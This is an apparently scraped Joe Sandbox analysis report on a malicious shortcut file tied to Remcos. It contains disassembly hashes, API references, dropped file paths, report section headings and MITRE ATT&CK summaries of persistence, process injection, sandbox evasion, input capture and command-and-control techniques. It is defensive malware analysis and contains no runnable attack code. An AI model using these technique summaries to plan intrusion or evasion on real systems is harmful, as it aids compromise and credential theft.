Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: csm
API String ID: 803148776-1018135373
Opcode ID: a711b0bedc9af858f1a86284ce073587ea150faf51f5d3325d337f2bcfad7745
Instruction ID: f1b12ce22d135680e44c6aa82d4144e3e347f5e866a36f455a5ea4bd5ab64f60
Opcode Fuzzy Hash: a711b0bedc9af858f1a86284ce073587ea150faf51f5d3325d337f2bcfad7745
Instruction Fuzzy Hash: 6B016D75A0E3059BCF248F68D6407AEBFB5AF10219F70442FD950AA790DB31AA84DF51

Function 6FEB0DE2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6FEB0DE9

Strings

Po, xrefs: 6FEB0E0B
xPo, xrefs: 6FEB0E13

Memory Dump Source

Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true

Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd

Similarity

API ID: H_prolog3
String ID: Po$xPo
API String ID: 431132790-3544800484
Opcode ID: 5cc9a10b35760f9d6539c9117f69bed7cab30e4a088f3424562a4ea2fe3e094f
Instruction ID: 5c73ef9a8f2a02994b14fcd55b299a0932d7ae6fe6068136af4403fdd55f38d1
Opcode Fuzzy Hash: 5cc9a10b35760f9d6539c9117f69bed7cab30e4a088f3424562a4ea2fe3e094f
Instruction Fuzzy Hash: 76F08172902311CFDF249B68CB857AD7FA1AF0431AF315A5FE2A54B6E0C775B840C682

Function 6FEA72FD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 6FEA7318
PathStripToRootW.SHLWAPI(00000000,00000104,00000000,00000104,?,6FEA7540,00000000,?), ref: 6FEA732D

Strings

@uo, xrefs: 6FEA7302, 6FEA7333

Memory Dump Source

Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true

Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd

Similarity

API ID: PathRootStrip_memset
String ID: @uo
API String ID: 2213896960-1137737743
Opcode ID: 3a9169efaff85f09b7c8b1987590648c425de4b2ca4be8dfebd8d23059ca3a19
Instruction ID: 9edb4f563a386f2d43e1c253626b8c50ff365ec412eefe2a20bd0c93b46ed081
Opcode Fuzzy Hash: 3a9169efaff85f09b7c8b1987590648c425de4b2ca4be8dfebd8d23059ca3a19
Instruction Fuzzy Hash: 5EE0DF3B10522437C6016A9D8C48EEF3F6D8FD7774F208229FA385B2D1DB35A91186B2

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report MdkbG2pK4l.lnk

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Remcos

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Exploits

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.log

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\161ebd1

C:\Users\user\AppData\Local\Temp\32f7631

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l31uaxlx.vs2.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oduknhyj.r2i.psm1

Windows Analysis Report
MdkbG2pK4l.lnk

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre